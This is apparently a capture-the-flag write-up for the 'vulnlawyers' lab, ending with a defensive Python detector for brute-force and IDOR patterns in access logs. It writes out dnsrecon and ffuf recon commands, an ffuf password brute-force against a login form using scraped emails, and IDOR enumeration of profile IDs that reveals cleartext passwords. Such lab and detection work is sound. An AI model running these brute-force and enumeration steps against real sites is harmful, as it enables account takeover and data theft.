vulnLawyersSteps.md

File metadata and controls

21 lines (21 loc) · 3.41 KB
  1. Subdomain discovery
    1. `dnsrecon -d vulnlawyers.co.uk -D ~/wordlists/subdomains.txt -t brt`
      • Found data.vulnlawyers.co.uk and www.vulnlawyers.co.uk
    2. Searching on crt.sh
      • Nothing found.
    3. Accessing data.vulnlawyers.co.uk shows this. (screenshot) Found Flag 1
  2. Content discovery on data.vulnlawyers.co.uk
    1. `ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://data.vulnlawyers.co.uk/FUZZ -mc all -fc 404` (screenshot)
    2. Visited /users/ and found some users' data. (screenshot) Found Flag 3. Does this mean that maybe there is a mail server running? No.
  3. Content discovery on www.vulnlawyers.co.uk
    1. `ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnlawyers.co.uk/FUZZ -mc all -fc 404` (screenshot)
    2. Visited /login in the browser, but it redirected me to the /denied page, which showed an "Access is denied from your IP address" error. (screenshot)
    3. Visited /login through the Burp proxy, and this showed. (screenshot) Found Flag 2
    4. Visited /lawyers-only through Burp, which redirected me to /lawyers-only-login, and then BOOM! A login portal. (screenshot)
  4. But from the data.vulnlawyers.co.uk/users API we found, we have a list of emails whose passwords we can now brute-force. Trying with the first user: `ffuf -w ~/wordlists/passwords.txt -t 1 -p 0.1 -X POST -d "email=marsha.blankenship%40vulnlawyers.co.uk&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnlawyers.co.uk/lawyers-only-login -mc all -fc 401`. Tried all users until I found this. (screenshot)
  5. Logged in with [email protected] and summer as the username and password respectively. Found this. (screenshot) Found Flag 4.
  6. Surfed the website to see what it does. Found a /lawyers-only-profile/ page; looking at its page source, I found this URL. (screenshot)
  7. Visited /lawyers-only-profile-details/4 and found that it reveals the password of every user in cleartext; it is also an IDOR vuln. (screenshot)
  8. Tried some ids and found another flag on /lawyers-only-profile-details/2. (screenshot) Found Flag 5
  9. It seems that user shayne.cairns is an admin because he can delete a case. (screenshot)
  10. The last flag showed after deleting the case with this admin account. (screenshot) Found Flag 6
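A defender-side view of steps 4 and 7 to 8, as an added example that is not part of this writeup: a small Python detector run over constructed access-log lines (sample data, not captured from the challenge) that flags repeated rejected POSTs to /lawyers-only-login from one client, and one client being served several distinct /lawyers-only-profile-details/<id> pages. The combined-log-format assumption and the thresholds are mine.

```python
import re
from collections import defaultdict

# Constructed sample log lines in combined log format (not from the challenge).
# 203.0.113.7 models the walkthrough: password guessing against
# /lawyers-only-login, then walking /lawyers-only-profile-details/<id>.
# 198.51.100.9 is a normal user viewing only their own profile.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /lawyers-only-login HTTP/1.1" 401 512
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "POST /lawyers-only-login HTTP/1.1" 401 512
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "POST /lawyers-only-login HTTP/1.1" 401 512
203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "POST /lawyers-only-login HTTP/1.1" 401 512
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "POST /lawyers-only-login HTTP/1.1" 401 512
203.0.113.7 - - [01/Jan/2024:10:00:07 +0000] "POST /lawyers-only-login HTTP/1.1" 302 0
203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /lawyers-only-profile-details/1 HTTP/1.1" 200 880
203.0.113.7 - - [01/Jan/2024:10:01:01 +0000] "GET /lawyers-only-profile-details/2 HTTP/1.1" 200 880
203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET /lawyers-only-profile-details/3 HTTP/1.1" 200 880
198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /lawyers-only-profile/ HTTP/1.1" 200 2048
198.51.100.9 - - [01/Jan/2024:10:02:05 +0000] "GET /lawyers-only-profile-details/4 HTTP/1.1" 200 880
"""

# Combined log format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
PROFILE_RE = re.compile(r'^/lawyers-only-profile-details/(\d+)$')

def parse(log_text):
    """Yield parsed entries, silently skipping lines that do not match the format."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def detect(log_text, login_threshold=5, idor_threshold=3):
    """Return sorted (alert, ip, count) tuples for the two behaviours."""
    failed_logins = defaultdict(int)   # ip -> rejected POSTs to the login form
    profile_ids = defaultdict(set)     # ip -> distinct profile ids served with 200
    for e in parse(log_text):
        if e["method"] == "POST" and e["path"] == "/lawyers-only-login" \
                and e["status"] in ("401", "403"):
            failed_logins[e["ip"]] += 1
        m = PROFILE_RE.match(e["path"])
        if m and e["status"] == "200":
            profile_ids[e["ip"]].add(int(m.group(1)))
    alerts = [("login_bruteforce", ip, n) for ip, n in failed_logins.items() if n >= login_threshold]
    alerts += [("idor_enumeration", ip, len(ids)) for ip, ids in profile_ids.items() if len(ids) >= idor_threshold]
    return sorted(alerts)
```

The profile walk happens inside an authenticated session, so keying the second rule on the session cookie rather than the client IP would be more robust; it uses the IP here only because the combined log format carries no session identifier.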